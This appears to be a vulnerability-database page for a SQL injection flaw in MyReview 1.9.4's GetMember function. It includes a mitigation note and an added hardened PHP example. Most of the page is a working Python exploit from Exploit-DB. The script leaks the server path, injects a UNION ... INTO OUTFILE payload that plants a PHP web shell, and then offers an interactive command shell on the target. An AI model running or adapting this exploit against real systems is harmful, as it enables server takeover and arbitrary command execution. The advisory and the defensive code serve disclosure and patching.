Vendor: MyReview
By: STILPU
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: MyReview
Affected Version From: 1.9.4
Affected Version To: 1.9.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

MyReview 1.9.4 SQL Injection exploit

MyReview 1.9.4 is vulnerable to SQL injection because the GetMember function in functions.php does not validate the $email parameter before interpolating it into a query. An attacker can use this to inject SQL into the application, read the database and, as the exploit below shows, write a PHP file through the database to execute arbitrary code on the server. The author's suggested patch is to add '$email=addslashes(trim($email));' before the query, or to replace the script altogether, which the author describes as very buggy.

Mitigation:

Input validation should be implemented to prevent SQL injection attacks.
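As an added example (not MyReview's own code), the vulnerable shape of GetMember() from the advisory next to a hardened version that validates the input and uses a prepared statement; the PDO connection, its DSN, and the replacement of the $db->execRequete() wrapper with PDO are assumptions made for this example.

```php
<?php
// Added example, not MyReview's code. The vulnerable function below mirrors the
// GetMember() quoted in the advisory (functions.php, around line 382).

// Vulnerable shape, kept for contrast: $email becomes part of the SQL text.
function GetMemberVulnerable($email, $db)
{
    $query = "SELECT * FROM PCMember WHERE email = '$email'";
    return $db->execRequete($query);
}

// Hardened version. The value is bound as a parameter, so quotes, comment
// markers and UNION ... INTO OUTFILE fragments are just characters in a string.
function GetMember(string $email, PDO $pdo, string $mode = "array")
{
    $email = trim($email);
    // Reject malformed input before it reaches the database; addslashes()
    // alone (the advisory's quick fix) is not a reliable defence.
    if (strlen($email) > 254 || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    $stmt = $pdo->prepare("SELECT * FROM PCMember WHERE email = :email");
    $stmt->bindValue(':email', $email, PDO::PARAM_STR);
    $stmt->execute();
    return $mode === "array" ? $stmt->fetch(PDO::FETCH_ASSOC) : $stmt->fetchObject();
}

// Assumed DSN and credentials, for illustration only.
$pdo = new PDO('mysql:host=localhost;dbname=myreview;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_EMULATE_PREPARES => false,            // server-side prepared statements
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);

// The advisory's probe value is a lone single quote. With the hardened function
// it is rejected by validation instead of producing a SQL error that leaks
// the installation path through a displayed warning.
var_dump(GetMember("'", $pdo));   // bool(false)
```

The exploit on this page also relies on PHP warnings being displayed (to learn the local path) and on FILES/ being writable via the database's INTO OUTFILE; disabling display_errors in production and running the application's database account without the FILE privilege removes both preconditions independently of the query fix.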

Exploit-DB raw data:

# MyReview 1.9.4 SQL Injection exploit
#
#
# http://myreview.lri.fr/
#
# in functions.php starting from line 382
# ............
#	function GetMember ($email, $db, $mode="array")
#	{
#  		$query = "SELECT * FROM PCMember WHERE email = '$email'" ;
#		$result = $db->execRequete ($query);
# ..........
# 
# $email is not checked before used into $query
# 
# for patch 
# 
# 1. add "$email=addslashes(trim($email));" before $query
# 2. use something else, very buggy script
#
# by STILPU (dmooray[a lu']gmail.com)
#


import httplib, urllib, re, urlparse, sys

def usage():
	print """
MyReview 1.9.4 SQL Injection exploit

Usage: python exploit.py http://target/pathtomyreview/

Requires warnings to be displayed so we can get the localpath and FILES/ to be writable

by STILPU  (dmooray[a lu']gmail.com)

"""
	sys.exit(1)

def getlocalpath(server):
	params=urllib.urlencode({'email':'\'','motDePasse':'a','ident':'Log in'})
	headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
	con = httplib.HTTPConnection(server)
	con.request("POST",path+"Admin.php",params,headers)
	resp=con.getresponse()
	data=resp.read()
	try:
		localpath=re.search('>/.*B',data[0:10000]).group().replace('>','',1).replace('B','',1)	
	except Exception: print "Exploit failed: didn't manage to get localpath"; sys.exit(1)
	return localpath
	
def sendshell(server):
	shell="'<?php error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'"
	sql="' union select " + shell + ",0,0,0,'*/ ?>' into outfile '" +getlocalpath(server)+ "FILES/STILPU.php' from PCMember#"
	headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
	params=urllib.urlencode({'email':sql,'motDePasse':'a','ident':'Log in'})
	con = httplib.HTTPConnection(server)
	con.request("POST",path+"Admin.php",params,headers)

def sendcmd(server):
	while 1:
		try:
			cmd=raw_input('sh$ ')
			cmd=cmd.replace(" ","+")
			con = httplib.HTTPConnection(target)
			con.request("GET",path+"FILES/STILPU.php?cmd="+cmd)
			resp=con.getresponse()
			data=resp.read()
			if (cmd=="exit" or cmd=="quit"): break
			print data
		except KeyboardInterrupt: break	


if __name__ == '__main__':

	if len(sys.argv) < 2:
		usage()		
	
	else:
		url = sys.argv[1]
		url = urlparse.urlsplit(url)
		target = url[1]
		path = url[2]
		
		sendshell(target)
		sendcmd(target)

# milw0rm.com [2006-09-19]